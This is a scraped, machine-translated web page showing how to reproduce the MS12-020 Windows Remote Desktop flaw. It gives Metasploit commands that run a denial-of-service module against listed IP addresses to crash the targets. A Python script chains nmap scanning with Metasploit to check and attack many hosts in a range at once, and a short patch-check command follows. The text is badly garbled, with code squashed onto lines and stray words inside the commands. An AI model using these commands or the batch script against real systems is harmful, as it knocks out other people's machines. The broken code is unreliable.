Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

Vulnerability recurrence and automatic batch Utilization of MS12-020

2025-01-29 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)06/01 Report--

Vulnerability describes Windows remote Desktop Protocol vulnerability, executable code, POC can lead to blue screen. (RDP remote Desktop execution Code vulnerability) affects the target Windows XP sp3Windows xp sp2Windows Vista sp2Windows 7Windows Server 2003Windows Server 2008Windows Server 2008 R2msfpayload to exploit msfconsoleuse auxiliary/dos/windows/rdp/ms12_020_maxchannelidsset rhost run

This pyload only supports a single target.

Quickly launch msfconsole-x "use auxiliary/dos/windows/rdp/ms12_020_maxchannelids;set rhost 10.129.10.10 leading runningset rhost 10.129.10.37" exiting runningset rhost 10.129.10.169 "exiting runningset rhost 10.129.10.209" transparently runningset rhost 10.129.10.232 "batch generate test script (nmap-port2ip.py) # encoding:utf-8import xml.saximport sysimport osclass MovieHandler (xml.sax.ContentHandler) through bash script: def _ _ init__ (self, filterport=None): self.CurrentData ="self.port=filterport self.data ="self.datas= [] # element starts event processing def startElement (self, tag Attributes): self.CurrentData = tag if tag = = "address": self.data=attributes ["addr"] # element end event handling def endElement (self, tag): if self.CurrentData = = "address": self.datas.append (self.data) self.data= "self.CurrentData ="class Gather (object): def _ _ init__ (self) Filterport=None): # create a XMLReader self.parser = xml.sax.make_parser () # turn off namepsaces self.parser.setFeature (xml.sax.handler.feature_namespaces, 0) # rewrite ContextHandler self.Handler = MovieHandler (filterport) self.parser.setContentHandler (self.Handler) def run (self Port): self.Handler.datas= [] self.parser.parse (port+ ".xml") print (self.Handler.datas) def get_ans (self): return self.Handler.datasif _ _ name__ = = "_ main__": if len (sys.argv)! = 3: os.exit () os.system ("nmap" + sys.argv [1] + "- p" + sys .argv [2] + "--open-oX" + sys.argv [2] + ".xml") g = Gather () g.run (sys.argv [2]) # create cmd cmd ='"use auxiliary/scanner/rdp/ms12_020_check Set threads 20 'ips = g.get_ans () if len (ips) > 0: for ip in g.get_ans (): cmd + = "set rhosts" + ip+ "; run;" cmd + =' exit " "'os.system (" msfconsole-x "+ cmd) # uses the method python nmap-port2ip.py # function: all hosts in the specified IP segment are detected for vulnerabilities in a service, the host IP that may have problems is obtained, and the corresponding Msf Payload is called to attempt exploitation. # ip can support a single IP, CIDR IP, 10.129.1.1-154,etc. The format is the same as nmap. # port only supports single port vulnerability patch detection systeminfo | find / I "KB2621440". If the result is as follows, it is proved to have been patched, otherwise, the corresponding patch is required.

Patch Windows Server 2003

Reference article Microsoft MS12-020

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Network Security

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report